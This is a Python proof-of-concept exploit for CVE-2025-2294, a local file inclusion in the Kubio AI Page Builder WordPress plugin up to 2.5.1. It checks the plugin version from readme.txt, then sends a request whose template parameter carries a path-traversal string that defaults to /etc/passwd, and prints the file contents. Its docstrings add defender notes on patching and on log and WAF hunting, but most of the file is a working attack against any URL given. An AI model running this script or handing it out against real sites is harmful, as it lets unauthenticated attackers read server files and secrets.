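"""Proof-of-concept check for CVE-2025-2294.

Affected software, as stated in this script's own CLI description: Kubio AI
Page Builder <= 2.5.1, unauthenticated local file inclusion.

Flow:
  1. GET ``<url>/wp-content/plugins/kubio/readme.txt`` and read ``Stable tag``.
  2. Only when that tag is a three-part version <= 2.5.1, send one GET with
     the ``__kubio-site-edit-iframe-preview`` and
     ``__kubio-site-edit-iframe-classic-template`` query parameters.
  3. Print whatever body the server returned.

Defender notes:
  * Remediation is to run a Kubio release later than 2.5.1.
  * Both query parameter names above appear verbatim in the request line, so
    they are usable for access-log hunting and WAF rules, especially when the
    template parameter carries ``../`` sequences as the default ``--file``
    value does.
  * ``readme.txt`` is only a heuristic for the installed version; for patch
    status, confirm the plugin version on the host itself.
"""

import requests
import argparse
import time

session = requests.Session()
# Silences urllib3's warnings, including the one for unverified HTTPS requests.
requests.packages.urllib3.disable_warnings()
# NOTE(review): certificate verification is off for every request made through
# this session, so nothing proves that a response came from the intended host.
# Treat the version verdict and any printed body as unauthenticated data.
session.verify = False

# The ASCII-art layout was lost when the page was flattened; the text is kept
# exactly as it appears in the source.
banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@! @@@ @@!@! !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@! @!@ !@!!@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ !!@!!@!! @!! @!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!@!!! !!! !@! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! !!! :!!:!:!!: :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! !:::!!::: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::::: :: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: : : : ::: By: Nxploited | Khaled Alenazi """


def _get_text(target):
    """GET *target* through the shared session and return the body text.

    Returns None after printing a one-line reason when the request fails or
    the server answers with an HTTP error status. Shared by fetch_readme()
    and send_exploit_request(), which previously duplicated this logic.
    """
    try:
        response = session.get(target, timeout=10)
        response.raise_for_status()
        return response.text
    except requests.HTTPError as http_err:
        print(f"[-] HTTP error occurred: {http_err}")
    except requests.RequestException as req_err:
        print(f"[-] Request error occurred: {req_err}")
    return None


def fetch_readme(url):
    """Return the Kubio plugin's readme.txt body for base *url*, or None on failure."""
    return _get_text(f"{url}/wp-content/plugins/kubio/readme.txt")


def is_vulnerable(readme_content):
    """Return True when the readme's first ``Stable tag`` is <= 2.5.1.

    Only the first line containing ``Stable tag:`` is examined, and only a
    tag made of exactly three dot-separated integers is compared. Any other
    shape, including a non-numeric component that previously raised an
    uncaught ValueError, is treated as "not vulnerable", so the caller never
    proceeds on a version it could not parse.

    Side effects on a positive result: prints a status line and sleeps 3 s.
    """
    for line in readme_content.splitlines():
        if "Stable tag:" not in line:
            continue
        version = line.split(":")[-1].strip()
        parts = version.split(".")
        if len(parts) == 3:
            try:
                release = tuple(int(part) for part in parts)
            except ValueError:
                # The value is server-supplied, so print it with repr().
                print(f"[-] Unparseable Stable tag {version!r}; treating target as not vulnerable.")
                return False
            if release <= (2, 5, 1):
                # The line break inside this message is kept as it appears in the source.
                print("[+] Target is vulnerable. \nExploiting...")
                time.sleep(3)
                return True
        # Only the first "Stable tag:" line is ever considered.
        break
    return False


def build_exploit_url(url, target_file):
    """Return *url* with the two Kubio iframe-preview query parameters appended.

    *target_file* is interpolated as given, with no URL-encoding applied.
    """
    return f"{url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={target_file}"


def send_exploit_request(full_url):
    """GET *full_url* and return the response body, or None on failure."""
    return _get_text(full_url)


def display_result(content):
    """Print the response body, or a failure line when *content* is empty/None.

    An HTTP 2xx with any non-empty body is reported as success; the body is
    not inspected, so an ordinary rendered page is reported the same way.
    """
    if content:
        print("[+] Exploit successful. File content:")
        # NOTE(review): this is unsanitised server-controlled text written
        # straight to the terminal.
        print(content)
    else:
        print("[-] Exploit failed or file not readable.")


def exploit(target_url, file_to_read):
    """Run the readme version check and, only if it passes, the file request."""
    readme = fetch_readme(target_url)
    if readme and is_vulnerable(readme):
        exploit_url = build_exploit_url(target_url, file_to_read)
        result = send_exploit_request(exploit_url)
        display_result(result)
    else:
        print("[-] Target is not vulnerable or readme.txt not accessible.")


if __name__ == "__main__":
    print(banner)
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., https://example.com)")
    parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd", help="File to read (default: /etc/passwd)")
    args = parser.parse_args()
    exploit(args.url.rstrip("/"), args.file)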